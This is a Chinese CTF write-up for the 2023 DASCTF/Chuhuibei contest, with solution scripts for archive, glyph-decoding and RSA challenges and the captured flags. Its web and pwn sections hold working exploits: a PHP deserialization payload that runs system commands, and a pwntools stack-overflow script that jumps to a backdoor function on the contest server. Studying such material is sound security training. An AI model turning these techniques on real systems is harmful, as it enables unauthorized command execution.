2023年楚慧杯(DASCTF)竞赛解题记录
MISC
ez_zip
通过Python脚本处理嵌套压缩包结构:
import zipfile
from io import BytesIO
def extract_nested_zip(file_path):
with open(file_path, "rb") as f:
content = f.read()
result = "taptap"
while True:
with zipfile.ZipFile(BytesIO(content)) as archive:
processed_all = True
for entry in archive.infolist():
filename = entry.filename.encode('cp437').decode('gbk')
if zipfile.is_zipfile(BytesIO(archive.read(entry.filename))):
content = archive.read(entry.filename)
processed_all = False
result += f" {filename.replace('.zip', '')}"
else:
with open(filename, "wb") as out_file:
out_file.write(archive.read(entry.filename))
if processed_all:
break
return result
info = extract_nested_zip("ez_zip.zip")
print(info)
获取1.txt后,将'+'替换为'1','-'替换为'0',转换二进制数据得到flag:DASCTF{10c58258ccf1e7c631e5911ed6acc4ed}
gb2312-80
使用点阵数据生成图像:
from PIL import Image
def create_image_from_data(data_str, index):
pixels = list(data_str)
img = Image.new("RGB", (16, 16))
for y in range(16):
for x in range(16):
color = (0, 0, 0) if pixels[y*16 + x] == '0' else (255, 255, 255)
img.putpixel((x, y), color)
img.save(f"{index}.png")
def convert_to_binary(data_line):
parts = data_line.split(',')
return ''.join(bin(int(num))[2:].zfill(16) for num in parts)
with open('cipher.txt') as file:
for idx, line in enumerate(file):
binary_data = convert_to_binary(line.strip())
create_image_from_data(binary_data, idx)
建立字符映射后解码:
mapping = {
'0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0': '0',
# ... 其他映射关系
}
with open('cipher.txt') as f:
for line in f:
print(mapping[line.strip()], end='')
将输出转换为ZIP文件,使用密码ILOVEHZK16解压获得flag:DASCTF{842a99305a07e6183830582d1740c1b1}
CRYPTO
so-large-e
读取RSA公钥参数:
from Crypto.PublicKey import RSA
with open('pub.pem') as f:
key_data = RSA.import_key(f.read())
n_val = key_data.n
e_val = key_data.e
cipher_text = 6838759631922176040297411386959306230064807618456930982742841698524622016849807235726065272136043603027166249075560058232683230155346614429566511309977857815138004298815137913729662337535371277019856193898546849896085411001528569293727010020290576888205244471943227253000727727343731590226737192613447347860
使用Boneh-Durfee攻击恢复私钥d后解密:
from Crypto.Util.number import long_to_bytes
d_key = 663822343397699728953336968317794118491145998032244266550694156830036498673227937
plain_text = long_to_bytes(pow(cipher_text, d_key, n_val))
print(plain_text)
WEB
eaaeval
通过目录扫描发现www.zip,分析代码发现反序列化漏洞:
class Flag:
def __init__(self):
self.a = "ls"
self.b = "/"
payload = 'O:4:"Flag":2:{s:1:"a";s:2:"ls";s:1:"b";s:1:"/";}'
通过构造payload执行系统命令查看flag.txt:
payload = 'O:4:"Flag":2:{s:1:"a";s:3:"cat";s:1:"b";s:9:"flag.txt";}'
PWN
ez_base
利用栈溢出漏洞跳转到后门函数:
from pwn import *
conn = remote("tcp.cloud.dasctf.com", 23938)
conn.recvuntil("2:decode")
conn.sendline("1")
conn.recvuntil("cin de_str:")
conn.sendline(b"q"*0x28 + p64(0x404911))
conn.interactive()